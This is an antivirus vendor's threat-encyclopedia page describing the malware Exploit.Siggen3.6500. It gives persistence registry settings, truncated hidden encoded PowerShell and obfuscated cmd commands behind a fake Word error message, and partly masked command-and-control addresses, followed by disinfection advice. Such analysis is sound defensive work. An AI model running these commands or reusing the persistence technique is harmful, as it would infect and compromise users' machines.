Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Exploit.Siggen3.6500

Добавлен в вирусную базу Dr.Web: 2020-12-29

Описание добавлено:

Technical Information

To ensure autorun and distribution
Sets the following service settings
  • [<HKLM>\System\CurrentControlSet\Services\zxhd.xth] 'Start' = '00000002'
  • [<HKLM>\System\CurrentControlSet\Services\zxhd.xth] 'ImagePath' = '%WINDIR%\SysWOW64\rundll32.exe "%WINDIR%\SysWOW64\Pfzmy\zxhd.xth",Control_RunDLL'
Creates the following services
  • 'zxhd.xth' %WINDIR%\SysWOW64\rundll32.exe "%WINDIR%\SysWOW64\Pfzmy\zxhd.xth",Control_RunDLL
Malicious functions
Executes the following (exploit)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD UwBlAHQALQBpAFQAZQBtACAAVgBBAHIASQBBAGIATABFADoANgBKAHIAIAAoACAAIABbAFQAeQBwAEUAXQAoACIAewA0AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AIgAtAGYAJwAuAEQASQByAEUAQwAnACwA...
Modifies file system
Creates the following files
  • %HOMEPATH%\xf5p77q\u1gvb1q\f_5p.dll
Deletes the following files
  • %WINDIR%\syswow64\pfzmy\zxhd.xth
Moves the following files
  • from %HOMEPATH%\xf5p77q\u1gvb1q\f_5p.dll to %WINDIR%\syswow64\pfzmy\zxhd.xth
Network activity
Connects to
  • '24.##1.88.85':80
  • '19#.#12.178.60':80
  • '50.##6.111.59':8080
TCP
HTTP GET requests
  • http://20#.#89.146.42/wp-admin/F0xAutoConfig/XR9/
HTTP POST requests
  • http://24.##1.88.85/cmfdmqim74umwplqs/5m7k2doc5gqcdyc/y2zrq4ockovkpv/7nqyrme9trn/
  • http://50.###.111.59:8080/5okulezcsp/utdks/msrj8kc0sbag/nm5q9e9/8hga8qv0/ via 50.##6.111.59
Miscellaneous
Executes the following
  • '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBlAHQALQBpAFQAZQBtACAAVgBBAHIASQBBAGIATABFADoANgBKAHIAI...
  • '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
  • '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Xf5p77q\U1gvb1q\F_5P.dll Control_RunDLL
  • '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\SysWOW64\Pfzmy\zxhd.xth",Control_RunDLL

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке